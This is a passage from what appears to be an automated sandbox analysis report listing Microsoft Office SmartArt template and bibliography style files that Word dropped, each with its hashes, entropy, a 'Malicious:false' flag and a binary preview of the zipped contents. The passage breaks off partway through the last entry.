                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):11380
                                                Entropy (8bit):7.891971054886943
                                                Encrypted:false
                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):6024
                                                Entropy (8bit):7.886254023824049
                                                Encrypted:false
                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):9191
                                                Entropy (8bit):7.93263830735235
                                                Encrypted:false
                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                Malicious:false
                                                Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):4326
                                                Entropy (8bit):7.821066198539098
                                                Encrypted:false
                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                Malicious:false
                                                Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):7370
                                                Entropy (8bit):7.9204386289679745
                                                Encrypted:false
                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                Malicious:false
                                                Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):5596
                                                Entropy (8bit):7.875182123405584
                                                Encrypted:false
                                                SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                MD5:CDC1493350011DB9892100E94D5592FE
                                                SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                Malicious:false
                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):3683
                                                Entropy (8bit):7.772039166640107
                                                Encrypted:false
                                                SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                Malicious:false
                                                Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):4888
                                                Entropy (8bit):7.8636569313247335
                                                Encrypted:false
                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                Malicious:false
                                                Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):6448
                                                Entropy (8bit):7.897260397307811
                                                Encrypted:false
                                                SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                MD5:42A840DC06727E42D42C352703EC72AA
                                                SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                Malicious:false
                                                Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):5630
                                                Entropy (8bit):7.87271654296772
                                                Encrypted:false
                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                Malicious:false
                                                Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):6193
                                                Entropy (8bit):7.855499268199703
                                                Encrypted:false
                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                Malicious:false
                                                Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):3075
                                                Entropy (8bit):7.716021191059687
                                                Encrypted:false
                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                Malicious:false
                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):5151
                                                Entropy (8bit):7.859615916913808
                                                Encrypted:false
                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                Malicious:false
                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):333258
                                                Entropy (8bit):4.654450340871081
                                                Encrypted:false
                                                SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
